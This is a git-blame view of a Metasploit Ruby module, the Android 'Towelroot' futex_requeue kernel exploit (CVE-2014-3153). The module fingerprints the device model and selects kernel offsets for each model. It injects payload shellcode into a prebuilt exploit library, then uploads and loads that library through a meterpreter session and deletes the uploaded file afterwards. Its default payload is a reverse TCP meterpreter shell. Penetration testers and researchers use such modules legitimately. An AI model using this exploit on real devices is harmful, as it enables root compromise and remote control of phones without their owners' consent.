metasploit-framework/modules/exploits/android/local/futex_requeue.rb

171 lines
5.0 KiB
Ruby
Raw Normal View History

2014-12-01 03:49:22 +00:00
##
2017-07-24 13:26:21 +00:00
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
2014-12-01 03:49:22 +00:00
##
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit::Local
2014-12-01 03:49:22 +00:00
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Common
def initialize(info={})
super( update_info( info, {
2015-02-12 18:11:40 +00:00
'Name' => "Android 'Towelroot' Futex Requeue Kernel Exploit",
2014-12-01 03:49:22 +00:00
'Description' => %q{
2015-02-12 18:11:40 +00:00
This module exploits a bug in futex_requeue in the Linux kernel, using
2017-08-29 00:17:58 +00:00
similar techniques employed by the towelroot exploit. Any Android device
2015-02-12 18:49:45 +00:00
with a kernel built before June 2014 is likely to be vulnerable.
2014-12-01 03:49:22 +00:00
},
'License' => MSF_LICENSE,
'Author' => [
2015-02-12 18:11:40 +00:00
'Pinkie Pie', # discovery
'geohot', # towelroot
'timwr' # metasploit module
2014-12-01 03:49:22 +00:00
],
'References' =>
[
[ 'CVE', '2014-3153' ],
[ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],
[ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ],
],
'DisclosureDate' => "May 03 2014",
'SessionTypes' => [ 'meterpreter' ],
2016-12-19 16:59:27 +00:00
'Platform' => [ "android", "linux" ],
'Payload' => { 'Space' => 2048, },
2014-12-01 03:49:22 +00:00
'DefaultOptions' =>
{
2016-12-19 16:59:27 +00:00
'WfsDelay' => 300,
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
},
'DefaultTarget' => 0,
'Targets' => [
# Automatic targetting via getprop ro.build.model
['Automatic Targeting', { 'auto' => true }],
2014-12-01 03:49:22 +00:00
# This is the default setting, Nexus 4, 5, 7, etc
['Default',
{
'new_samsung' => false,
'iovstack' => 2,
'offset' => 0,
'force_remove' => false,
}
],
2014-12-01 03:49:22 +00:00
# Samsung devices, S4, S5, etc
['New Samsung',
{
'new_samsung' => true,
'iovstack' => 2,
'offset' => 7380,
'force_remove' => true,
}
],
# Older Samsung devices, e.g the Note 2
['Old Samsung',
{
'new_samsung' => false,
'iovstack' => 1,
'offset' => 0,
'force_remove' => true,
}
],
# Samsung Galaxy Grand, etc
['Samsung Grand',
{
'new_samsung' => false,
'iovstack' => 5,
'offset' => 0,
'force_remove' => true,
}
],
]
}
))
2014-12-01 03:49:22 +00:00
end
def exploit
if target['auto']
product = cmd_exec("getprop ro.build.product")
fingerprint = cmd_exec("getprop ro.build.fingerprint")
print_status("Found device: #{product}")
print_status("Fingerprint: #{fingerprint}")
2014-12-01 03:49:22 +00:00
if [
"mako",
"m7",
"hammerhead",
"grouper",
"Y530-U00",
"G6-U10",
"g2",
"w7n",
"D2303",
"cancro",
].include? product
2016-11-06 14:33:24 +00:00
my_target = targets[1] # Default
elsif [
"klte",
"jflte",
].include? product
2016-11-06 14:33:24 +00:00
my_target = targets[2] # New Samsung
elsif [
"t03g",
"m0",
].include? product
2016-11-06 14:33:24 +00:00
my_target = targets[3] # Old Samsung
elsif [
"baffinlite",
"Vodafone_785",
].include? product
2016-11-06 14:33:24 +00:00
my_target = targets[4] # Samsung Grand
else
print_status("Could not automatically target #{product}")
2016-11-06 14:33:24 +00:00
my_target = targets[1] # Default
end
2016-11-06 14:33:24 +00:00
else
my_target = target
end
2014-12-01 03:49:22 +00:00
2016-11-06 14:33:24 +00:00
print_status("Using target: #{my_target.name}")
2014-12-01 03:49:22 +00:00
local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2014-3153.so" )
exploit_data = File.read(local_file, {:mode => 'rb'})
# Substitute the exploit shellcode with our own
space = payload_space
payload_encoded = payload.encoded
exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
# Apply the target config
2016-11-06 14:33:24 +00:00
offsets = my_target.opts
config_buf = [
offsets['new_samsung'] ? -1 : 0,
offsets['iovstack'].to_i,
offsets['offset'].to_i,
offsets['force_remove'] ? -1 : 0,
].pack('I4')
exploit_data.gsub!("c0nfig" + "\x00" * 10, config_buf)
2014-12-01 03:49:22 +00:00
workingdir = session.fs.dir.getwd
remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
write_file(remote_file, exploit_data)
print_status("Loading exploit library #{remote_file}")
session.core.load_library(
'LibraryFilePath' => local_file,
'TargetFilePath' => remote_file,
'UploadLibrary' => false,
'Extension' => false,
'SaveToDisk' => false
)
2016-12-19 16:59:27 +00:00
print_status("Loaded library #{remote_file}, deleting")
session.fs.file.rm(remote_file)
2016-12-19 16:59:27 +00:00
print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
end
2014-12-01 03:49:22 +00:00
end